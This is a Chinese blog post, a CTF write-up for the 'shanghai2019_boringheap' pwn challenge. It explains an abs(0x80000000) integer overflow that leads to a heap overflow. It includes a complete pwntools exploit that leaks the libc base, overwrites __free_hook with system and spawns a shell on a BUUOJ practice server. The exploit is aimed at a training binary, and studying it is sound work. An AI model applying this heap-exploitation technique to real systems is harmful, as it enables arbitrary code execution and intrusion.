shanghai2019_boringheap(abs函数溢出点)

最新推荐文章于 2021-12-06 23:09:09 发布
最新推荐文章于 2021-12-06 23:09:09 发布
阅读量546 收藏
点赞数
分类专栏: pwn 二进制漏洞 CTF 文章标签: PWN CTF 二进制漏洞 缓冲区溢出 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/106674770
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

shanghai2019_boringheap

首先,检查一下程序的保护机制

然后,我们用IDA分析一下,edit函数里使用了abs函数,abs函数接收4字节有符号int数,当传入0x80000000时,其返回结果仍然是0x80000000,由于4字节int正数将无法表示这么大,因此,其值是一个负数,由此,可以造成堆溢出。

然后就可以利用了

#coding:utf8
from pwn import *

#sh = process('./shanghai2019_boringheap')
sh = remote('node3.buuoj.cn',25580)
libc = ELF('/lib/x86_64-linux-gnu/libc-2.27.so')
malloc_hook_s = libc.symbols['__malloc_hook']
free_hook_s = libc.symbols['__free_hook']
system_s = libc.sym['system']

def add(type,content):
   sh.sendlineafter('5.Exit','1')
   sh.sendlineafter('3.Large',str(type))
   sh.sendlineafter('Input Content:',content)

def edit(index,offset,content):
   sh.sendlineafter('5.Exit','2')
   sh.sendlineafter('Which one do you want to update?',str(index))
   sh.sendlineafter('Where you want to update?',str(offset))
   sh.sendlineafter('Input Content:',content)


def delete(index):
   sh.sendlineafter('5.Exit','3')
   sh.sendlineafter('Which one do you want to delete?',str(index))

def show(index):
   sh.sendlineafter('5.Exit','4')
   sh.sendlineafter('Which one do you want to view?',str(index))

for i in range(20):
   add(2,'a')
#向上溢出,修改到自身的头,伪造一个large bin
payload = '\x00'*0x18 + p64(0x441)
edit(0,0x80000000,payload)
delete(0)
add(2,'a') #20
show(1)
sh.recvuntil('\n')
main_arena_xx = u64(sh.recv(6).ljust(8,'\x00'))
malloc_hook_addr = (main_arena_xx & 0xFFFFFFFFFFFFF000) + (malloc_hook_s & 0xFFF)
libc_base = malloc_hook_addr - malloc_hook_s
free_hook_addr = libc_base + free_hook_s
system_addr = libc_base + system_s
print 'libc_base=',hex(libc_base)
print 'free_hook_addr=',hex(free_hook_addr)
print 'system_addr=',hex(system_addr)
add(2,'a') #21
delete(1)
edit(21,0,p64(free_hook_addr))
add(2,'/bin/sh\x00') #22
add(2,p64(system_addr))
#getshell
delete(22)

sh.interactive()

 

ha1vk
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
shanghai2018_baby_arm
06-03
arm64架构的pwn
SVM--regression-analysis.rar_shanghai index_svm 预测_svm数据预测_svm预测
09-21
3. **优化问题**: SVM的目标是找到一个能够最小化ε-绝缘损失函数的超平面,同时最大化与最近数据的距离(称为间隔)。这可以通过解决一个凸二次规划问题来实现。 **上证指数预测** 上证指数是衡量中国股票市场...
shanghai2019_boringheap
doudoudedi
02-18 354
思路 abs函数(取绝对值)的溢出使得为负数然后改size构造2个指针指向同一chunk完成一次double free为远程ubuntu18即可以直接打free_hook exp: from pwn import * #p=process('./pwn') p=remote('node3.buuoj.cn',26942) elf=ELF('./pwn') libc=elf.libc def ad...
abs 不会整数 方法 溢出_abs(int) 竟然 return int 而不是 uint
weixin_40008884的博客
12-19 656
gets、puts确实由于历史遗留问题并不是很好的设计。但abs并不是。因为c/c++中规定了有符号整数与无符号整数的运算结果类型一般为无符号整数,如果abs这种基础运算函数返回无符号整数,那么在表达式中使用了abs很容易让整个表达式变成无符号整数运算,更容易导致错误的计算结果。让abs返回有符号整数在大部分场景下会更加安全,在数值运算中保持数值类型不变通常也更加符合用户的预期。例如,假设i,j,...
2019 上海市大学生安全赛 boring_heap 经验总结
qq_43189757的博客
11-03 229
这题盯了一上午没发现漏洞…, 然后就自闭了 但是就算自闭, 学还是要学的… 程序分析: 常规操作都齐了 1.add 程序中限制了创建的chunk的size只能为0x20, 0x30, 0x40 其中之一 2.update 相当于edit, 不过可以制动 ...
abs 不会整数 方法 溢出_LeetCode | Divide Two Integers
weixin_33553051的博客
12-29 319
Divide two integers without using multiplication, division and mod operator.If it is overflow, return MAX_INT. 要求不使用乘法、除法或模运算实现: dividend/divisor,也就是只能用加、减或位运算。int的取值范围[-2147483648, 2147483647],即最小值的a...
使用git remote提交代码
菜鸡小白的成长记录
10-25 607
git remote上传本地代码到远程仓库: 第一次上传本地代码,可以按照如下流程: 1. git init # 初始化本地代码仓库 2. git checkout -b develop # 创建并切换到develop分支 3. git remote add origin httpxxxx # 关联远程仓库 4. git add . # 添加工作区的代码到缓存区 5. git commit -m "v1.0" # 提交代码 说明提交信息 6. git pull --rebase origi
Shanghai.zip_shanghai_shengsi jie
07-14
brings stable monthly profit without failures or losses.
WeatherInfo.rar_forcast csharp_shanghai_weatherinfo
09-19
标题中的“WeatherInfo.rar_forcast csharp_shanghai_weatherinfo”暗示了这个压缩包包含的是一个C#编程语言实现的天气预报应用,主要针对上海地区的天气信息。这个应用可能是一个Web服务,允许用户查询和获取上海的...
shanghai.rar_shanghai_场馆
09-23
在【上海世博会某场馆BA系统控制原理图】中,我们可以深入学习以下几个关键知识: 1. **系统架构**:BA系统通常由中央监控站、远程I/O站、现场设备和通信网络构成。中央监控站负责数据采集、处理和报警,远程I/...
abs 不会整数 方法 溢出_[Java解惑]数值表达式
weixin_39946534的博客
12-19 327
数值表达式1.奇偶判断2.小数精确计算3.int整数相乘溢出4.负的十六进制与八进制字面常量5.窄数字类型提升至宽类型时使用符号位扩展还是零扩展6.((byte)0x90 == 0x90)?7.三元表达式(?:)8.+=复合赋值问题9.i =++i;与i=i++;的区别10.Integer.MAX_VALUE+ ...
回顾JavaScript基础——内置对象
qq_43632167的博客
10-06 188
1:内置对象:Number 1)Number对象可以把字符串转换为数字 (1)转换字符串为整数 var strNum = "15"; //var num = Number.parseInt(strNum); var num = parseInt(strNum); 2)将代表小数的字符串转换为flost类型 var strNum = "12.34"; var num = parseFloat(strNum); 3)NaN也是Number类型 var strNum = "abc"; var num = pa
一个关于abs的小坑
03-22 2065
上代码 float b=1.0; float a=1.1; if(abs(b-a)>0.0000000001) { printf("true\n"); } else { printf("false"); } 结果会是true还是false呢?设计意图肯定是要true的,在windows下用vs2010编译,出来结果也是对的。但是在linux下结果却是f...
Java:整形溢出导致Math.abs(-2147483648) 的返回值为-2147483648
KaiSarH
02-01 1717
Math.abs(-2147483648) 的返回值为-2147483648
PWN-整数溢出
recover517的博客
12-06 1729
一、特殊数字 二、整数字节对照表 三、溢出漏洞 四、符号转换类漏洞
abs 不会整数 方法 溢出_Java如何处理整数下溢和溢出以及如何检查它?
weixin_39989875的博客
12-19 228
好吧,就原始整数类型而言,Java根本不处理Over / Underflow(对于float和double,行为是不同的,它将像IEEE-754强制要求一样刷新到+/-无穷大)。添加两个int时,如果发生溢出,则不会显示任何指示。 检查溢出的一种简单方法是使用下一个更大的类型来实际执行操作,并检查结果是否仍在源类型的范围内:public int addWithOverflowCheck(int a...
abs 不会整数 方法 溢出_Math.abs()方法不一定总是返回整数
weixin_39732991的博客
02-15 1102
下面的程序将生成整数对3取余的柱状图,那么,它将打印出什么呢?public class Mod {public static void main(String[ ] args) {final int MODULUS = 3;int[] histogram = new int[MODULUS];// Iterate over all ints (Idiom from Puzzle 26)int i ...
负数取绝对值时小心越界:如Math.abs(-2147483648)
CodeCoke的博客
06-24 1380
1、java中使用10亿以上数字时请使用**long类型**,可以有效避免整数溢出。 2、对Integer.MIN_VALUE取绝对值仍为Integer.MIN_VALUE,(0x80000000按照补码取负规则还是0x80000000)。
Math.abs()方法
热门推荐
荒的博客
11-08 6万+
abs public static int abs(int a) 返回 int 值的绝对值。如果参数为非负数,则返回该参数。如果参数为负数,则返回该参数的相反数。 注意,如果参数等于 Integer.MIN_VALUE 的值(即能够表示的最小负 int 值),那么结果与该值相同且为负。 参数:a - 要确定绝对值的参数。返回:参数的绝对值。另请参见:Integer.MIN_VALU
mobike_shanghai_sample_updated数据分析、
最新发布
12-23
mobike_shanghai_sample_updated数据是指摩拜共享单车在上海市的样本数据集。这些数据包括了单车的使用情况、停放位置、骑行时间、用户行为等信息。通过对这些数据进行分析,我们可以获得很多有用的信息。 首先,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值